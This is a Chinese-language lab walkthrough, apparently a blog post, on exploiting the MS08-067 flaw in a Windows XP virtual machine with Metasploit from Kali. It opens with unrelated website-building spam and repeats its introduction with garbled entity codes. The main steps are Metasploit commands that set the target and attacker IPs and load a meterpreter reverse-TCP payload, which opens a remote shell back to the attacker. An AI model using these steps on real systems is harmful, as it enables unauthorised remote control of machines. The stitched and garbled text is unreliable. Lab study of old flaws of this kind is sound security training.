手机建网站优帮云,网站外包,文山知名网站建设哪家好,宁波外贸网站设计kali利用msf工具对ms08-067漏洞入侵靶机#xff08;win xp2#xff09;
漏洞简介
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本#xff0c;甚至还包括测试阶段的Windows 7 Pro-Beta。
如果用户在受影响的系统上收到特制的 RPC 请求win xp2
漏洞简介
MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本甚至还包括测试阶段的Windows 7 Pro-Beta。
如果用户在受影响的系统上收到特制的 RPC 请求则该漏洞可能允许远程执行代码。 在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上攻击者可能未经身份验证即可利用此漏洞运行任意代码。 此漏洞可能用于进行蠕虫攻击。 防火墙最佳做法和标准的默认防火墙配置有助于保护网络资源免受从企业外部发起的攻击。 实验环境 工具metasploit
靶机两台windows xp2和kali2020
攻击机的IPkali192.168.29.133
靶机IPxp2: 192.168.29.134
实验条件两台机子可以互通的并且windows xp2需打开445端口默认为打开开启了445端口防火墙是关闭的。 步骤
1在kali终端输入msfconsole启动Metasploit工具 2输入命令search ms08_067,查找关于ms08_067的漏洞模块。 3输入如下命令使用该漏洞模块 4进入这个模块后用show options 查看该模块需要配置的参数 5设置配置项show options
设置靶机IPxp2set RHOST 192.168.29.134 设置要执行的payload: set payload windows/meterpreter/reverse_tcp 设置攻击机的IPkaliset LHOST 192.168.29.133 设置要攻击的目标操作系统类型set target 34 用show options查看相关参数是否配置正确 6最后输入exploit回车运行,进入到特殊的payload---meterpreter该payload在控制靶机之后能够对靶机执行更多的渗透攻击。用 pwd查看靶机当前的工作路径用ipconfig命令查看靶机的IP地址配置。